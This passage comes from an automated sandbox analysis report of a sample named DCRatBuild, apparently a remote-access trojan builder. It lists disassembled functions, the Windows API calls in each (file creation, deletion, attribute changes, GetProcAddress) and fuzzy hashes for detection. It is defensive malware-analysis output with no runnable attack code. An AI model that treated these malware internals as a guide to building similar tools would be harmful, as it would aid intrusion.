Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 20284007f6d45a38f6efbe8aa4d5e0229bef3c917f16004f90a70353692c4a97
Instruction ID: 7f59633d3e33d62cb4b223f33ac78587527582f3e7228b7d38408b04c16bd72c
Opcode Fuzzy Hash: 20284007f6d45a38f6efbe8aa4d5e0229bef3c917f16004f90a70353692c4a97
Instruction Fuzzy Hash: F331D331608305AFDB14CF20D818BAE77A5FFC6710F00892DF54997290C779AD48CBA6

Function 0007A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 0007C27E: _wcslen.LIBCMT ref: 0007C284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0007A175,?,00000001,00000000,?,?), ref: 0007A2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0007A175,?,00000001,00000000,?,?), ref: 0007A30C
GetLastError.KERNEL32(?,?,?,?,0007A175,?,00000001,00000000,?,?), ref: 0007A329

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: 5a60e21a5f4d1b3aeb8b054ae746852b59a52f7b02225081f18b16c8edc8d1a9
Instruction ID: 50d289cad98640beaeda85f74bd02e2a7bb4d285d57b9f7f1bf4fbc511b368fb
Opcode Fuzzy Hash: 5a60e21a5f4d1b3aeb8b054ae746852b59a52f7b02225081f18b16c8edc8d1a9
Instruction Fuzzy Hash: 54019221B046146AEF61AE758C09BFD3288AF4B780F048415F909D6082D76CCB8286AA

Function 0009B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0009B8B8

Strings

, xrefs: 0009B8FD

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 07aa40876f1029a7804abd224ff556e8c52b44f88d9b01b2e1c76dd6d32f7a02
Instruction ID: 41f5eff14869c44e48148eaccbe60d03162a87e22f2d14393d17b2c47bcc2479
Opcode Fuzzy Hash: 07aa40876f1029a7804abd224ff556e8c52b44f88d9b01b2e1c76dd6d32f7a02
Instruction Fuzzy Hash: 6041F67050428C9EDF218E28DD84BFABBE9EB46314F1404EDE6DAC7142D335AA45EF61

Function 0009AC98 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 0009ACF8

Strings

@, xrefs: 0009ACCF, 0009ACE3, 0009ACD4

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AddressProc
String ID: @
API String ID: 190572456-1838441277
Opcode ID: 1fec818a99662830aefdfb1ebd707fbe21162bfd9d2d2aed4ddbf416ca930e13
Instruction ID: 4db152af4402922caf3e22ddf96127d8d77ab21829583c82e2cd97bdeef8e23c
Opcode Fuzzy Hash: 1fec818a99662830aefdfb1ebd707fbe21162bfd9d2d2aed4ddbf416ca930e13
Instruction Fuzzy Hash: 12112973B05625AFAF269E28EC4099E73D5EB863607164220FC16EF254D734DC01A7D2

Function 0009AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 0009AFDD

Strings

LCMapStringEx, xrefs: 0009AF7D, 0009AF87

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 62124060866e7096520cfc8fa9ba19adb741474467fd377c3980c93bcfc160f9
Instruction ID: 85e44b551a5310b1fc29fe4ba800635a275b6db853fc49b852787de4a3e26f83
Opcode Fuzzy Hash: 62124060866e7096520cfc8fa9ba19adb741474467fd377c3980c93bcfc160f9
Instruction Fuzzy Hash: 4F01E932604109BBCF125F90DC06DEF7F62EF4A750F014155FE1866161C6368931AB91

Function 0009AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0009A56F), ref: 0009AF55

Strings

InitializeCriticalSectionEx, xrefs: 0009AF1B, 0009AF25

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 621dbdd1bc35b8f4b6e004750aca785a164067690dc7fc041935dc7e451a50ce
Instruction ID: c4a50b24facdbcbcaf290a31bc8f819072542c378985bbcff1f057c607262265
Opcode Fuzzy Hash: 621dbdd1bc35b8f4b6e004750aca785a164067690dc7fc041935dc7e451a50ce
Instruction Fuzzy Hash: 9AF0E931745208BFCF115F90CC06DAF7FA1EF06751B008065FD089A260DA314E11A7C6

Function 0009ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0009ADEE

Strings

FlsAlloc, xrefs: 0009ADC0, 0009ADCA

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 3cedcd17b00d506109cd5e50557bc6dea579a16b55ad842a3af7e4591ae25884
Instruction ID: 222f80f1ff65b93ca5873e323dfd62b20bed2b5a5ee7de06586c90a4eae31e07
Opcode Fuzzy Hash: 3cedcd17b00d506109cd5e50557bc6dea579a16b55ad842a3af7e4591ae25884
Instruction Fuzzy Hash: 36E02B317452187BDB11ABA5DC02D6FBB94DB47721F0141AAFD0AAF240CE745E0197D6

Function 0009BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0009B7BB: GetOEMCP.KERNEL32(00000000,?,?,0009BA44,?), ref: 0009B7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0009BA89,?,00000000), ref: 0009BC64
GetCPInfo.KERNEL32(00000000,0009BA89,?,?,?,0009BA89,?,00000000), ref: 0009BC77

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: ecd17957c6f21838036d1bccc5ce42e719fc0fd1cddee75b4c465bf100949077
Instruction ID: 40041650f067a85d1ab8db0f9eff778be62aadcf3fadbcf4c0e3f399982dd9ac
Opcode Fuzzy Hash: ecd17957c6f21838036d1bccc5ce42e719fc0fd1cddee75b4c465bf100949077
Instruction Fuzzy Hash: A65157B09043459EDF20DF75E9816FBBBE5EF42320F14447ED4968B292EB349941EB90

Function 00079A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00079A50,?,?,00000000,?,?,00078CBC,?), ref: 00079BAB
GetLastError.KERNEL32(?,00000000,00078411,-00009570,00000000,000007F3), ref: 00079BB6

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: a08263c4261cd0c103c933f0c08e556e64fbd28553bb9da6250a18f5edd8b782
Instruction ID: aa7e596e1eb3a1adabc3f6c0bd9e96c8d1a66a6d02af61ab6f51e18203a3cda7
Opcode Fuzzy Hash: a08263c4261cd0c103c933f0c08e556e64fbd28553bb9da6250a18f5edd8b782
Instruction Fuzzy Hash: 5D41D130D04301CFDB24DF18E68446AB7E5FBD5320F15C92DE88983260D778EC048B9A

Function 00071E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00071E55

Part of subcall function 00073BBA: __EH_prolog.LIBCMT ref: 00073BBF

_wcslen.LIBCMT ref: 00071EFD

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: 4c598f5cf85c7187514ceece81712ddd351dcb76bcd0246ec682481212be7a52
Instruction ID: a30cc335187e750591969d4455b2a6ee0daac27078e6a7b929b8e368a4c0f49b
Opcode Fuzzy Hash: 4c598f5cf85c7187514ceece81712ddd351dcb76bcd0246ec682481212be7a52
Instruction Fuzzy Hash: BD312C71D041099FCF55EF98C945AEEBBF9BF48300F108069E489B7292CB365E11DB64

Function 00079DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,000773BC,?,?,?,00000000), ref: 00079DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 00079E70

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: d70430c8c51ea57d6e6f8ccefa7796a1b886d9e65335e8b51972baf6dd5191e2
Instruction ID: 5c270ffc29b0f8b8de2fc6e9a3062d90ac13b724a5f4439e9b4ec3c52e87f865
Opcode Fuzzy Hash: d70430c8c51ea57d6e6f8ccefa7796a1b886d9e65335e8b51972baf6dd5191e2
Instruction Fuzzy Hash: 9921D031648245AFC724DF74C891AABBBE8AF56304F08891DF8C987141D32DEE0DDBA5

Function 0007966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00079F27,?,?,0007771A), ref: 000796E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00079F27,?,?,0007771A), ref: 00079716

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 940c13d28cdd8668e6100aa042443cf9c46fd95392e6dc46a1bb83d66ffd2983
Instruction ID: 383f13a206046eccd25dc60fee1ab3d1860412a3f52a2e1501d662ac567a2b9f
Opcode Fuzzy Hash: 940c13d28cdd8668e6100aa042443cf9c46fd95392e6dc46a1bb83d66ffd2983
Instruction Fuzzy Hash: 0221C1B19047446FE3709A65CC89FE777DCEB49320F008B19FAD9C21D2C778A8848631

Function 00079E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00079EC7
GetLastError.KERNEL32 ref: 00079ED4

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 76cd9772fdbe312a20370e28740e2b0daf4303331b0b303f5644ab29d354961b
Instruction ID: 66a595f51ff1150d19cffe50b2e2beed19e8ed61c0f3756a0979c98feaf042b8
Opcode Fuzzy Hash: 76cd9772fdbe312a20370e28740e2b0daf4303331b0b303f5644ab29d354961b
Instruction Fuzzy Hash: 8A11E530E00700ABE734D628CC41BEAB7E9AB45360F60CA29E15BD26D1D7B8ED45C764

Function 00098E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00098E75

Part of subcall function 00098E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00094286,?,0000015D,?,?,?,?,00095762,000000FF,00000000,?,?), ref: 00098E38

RtlReAllocateHeap.NTDLL(00000000,?,?,?,00000007,000B1098,000717CE,?,?,00000007,?,?,?,000713D6,?,00000000), ref: 00098EB1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AllocateHeap$_free
String ID:
API String ID: 1482568997-0
Opcode ID: 7c27d57688e62378d2f045c261174be8f18ecff2a7797d0a393ba76b5d609557
Instruction ID: f5a82f0c9d710b8eb18f8b10234c453b090cabdb8222a9e705f9fd7d2b12936b
Opcode Fuzzy Hash: 7c27d57688e62378d2f045c261174be8f18ecff2a7797d0a393ba76b5d609557
Instruction Fuzzy Hash: 75F0F63260220166DF312A259C15BAF37988FD3B70F24C12AF818A7392DF71CD00B3A0

Function 0008109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 000810AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 000810B2

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 8285927aa6e692db7fc17a5204d0d76ff0090c1e571e38f7f192074b787d8db7
Instruction ID: 68bbcad9d543e84e0c1b822d435249e48eaf4e67effcd55ca684cc978e954b9f
Opcode Fuzzy Hash: 8285927aa6e692db7fc17a5204d0d76ff0090c1e571e38f7f192074b787d8db7
Instruction Fuzzy Hash: 7FE09232B00545A79F0997A49C159EB73DDFF452043104275E443D3201F9B4DE424BA0

Function 0007A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0007A325,?,?,?,0007A175,?,00000001,00000000,?,?), ref: 0007A501

Part of subcall function 0007BB03: _wcslen.LIBCMT ref: 0007BB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0007A325,?,?,?,0007A175,?,00000001,00000000,?,?), ref: 0007A532

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 761fd042f32bee7319ae796fbcc2f3c091a9e9ebe0b3f23cf3c1e926f04d578e
Instruction ID: a2cf793c6443b22eb702b2b0402ae3d8b3211185e720df3d08c217aac65ae0c5
Opcode Fuzzy Hash: 761fd042f32bee7319ae796fbcc2f3c091a9e9ebe0b3f23cf3c1e926f04d578e
Instruction Fuzzy Hash: 9DF0A932600209BBEF016F60DC01FDE37ACBB05389F48C060B848D6160DB75DA98EB10

Function 0007A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,0007977F,?,?,000795CF,?,?,?,?,?,000A2641,000000FF), ref: 0007A1F1

Part of subcall function 0007BB03: _wcslen.LIBCMT ref: 0007BB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0007977F,?,?,000795CF,?,?,?,?,?,000A2641), ref: 0007A21F

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: dfd8922043426844d745652ee2733d7778387bcef47dc1b2cbfd6b0180ad7012
Instruction ID: c0951df5b571ad6ed905b840b94af29734b7820abf2ec699f8d992197a964223
Opcode Fuzzy Hash: dfd8922043426844d745652ee2733d7778387bcef47dc1b2cbfd6b0180ad7012
Instruction Fuzzy Hash: EBE09231A402096BEB416F64DC45FDF379CBB09381F488021B948D2091EB65DE85DA54

Function 0008AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,000A2641,000000FF), ref: 0008ACB0
CoUninitialize.COMBASE(?,?,?,?,000A2641,000000FF), ref: 0008ACB5

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 1ae318be1d3587c4d95444203edc067ca8e618bde9e06d43a1851c0a3c8a628c
Instruction ID: 8662ed44a04c6a1abf8bd0e0e37fa6d80b191658a920ff5fd7f07f03245a6db9
Opcode Fuzzy Hash: 1ae318be1d3587c4d95444203edc067ca8e618bde9e06d43a1851c0a3c8a628c
Instruction Fuzzy Hash: 98E06572544650EFD700AB5CDC06B45FBACFB49B20F004366F416D3760CB786800CB94

